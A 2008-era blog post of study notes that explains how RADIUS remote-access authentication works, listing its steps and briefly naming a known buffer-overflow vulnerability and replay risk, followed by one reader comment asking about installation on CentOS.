09
Jun
08

Remote Access: (1) RADIUS

RADIUS (Remote Authentication Dial In User Service) used to authenticate usernames and passwords. A RADIUS work alone or in distributed mode (hiearachy). In distributed RADIUS, RADIUS server forward the authentication request to an enterprise RADIUS server using protocol called proxy RADIUS.

Why RADIUS is popular? Because it support

  • Point-to-Point Protocol (PPP)
  • Password Authentication Protocol (PAP)
  • Challenge Handshake Authentication Protocol (CHAP)

RADIUS authentication consists of six steps:

Client/Server model using AAA (Authentication, Authorization, Accounting)

1. Users initiate a connection with an ISP RAS or corporate RAS. Once a connection is established, users are prompted for a username and password.

2. The RAS encrypts the credential using a shared secret, and passes the encrypted packet to the RADIUS server. The transaction is done via UDP. Only password is encrypted.

3. The RADIUS server attempts to verify the user’s credentials against a centralized database.

4. If the credentials match those found in the database, the server responds with an access-accept message. If the username does not exist or the password is incorrect, the server responds with an access-reject message. It would also response with access-challenge message if the information is insufficient for authentication.

5. The RAS then accepts or rejects the message and grants the appropriate rights.

6. RAS will then send RADIUS server Accounting request message like account type, priviledge etc. Accounting Response is replied by RADIUS.

RADIUS vulnerability

Buffer-overflow –Multiple Vendor RADIUS Digest Calculation Buffer Overflow Vulnerability

UDP – Since UDP is a connectionless protocol, thus the connectivity is not guaranteed (the connection could be dropped anytime without notice) and replay attack is applicable.

Advertisements

1 Response to “Remote Access: (1) RADIUS”


  1. December 25, 2010 at 11:50 pm

    how can i install it on centos ? there is a totu for that ?
    thanks,


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: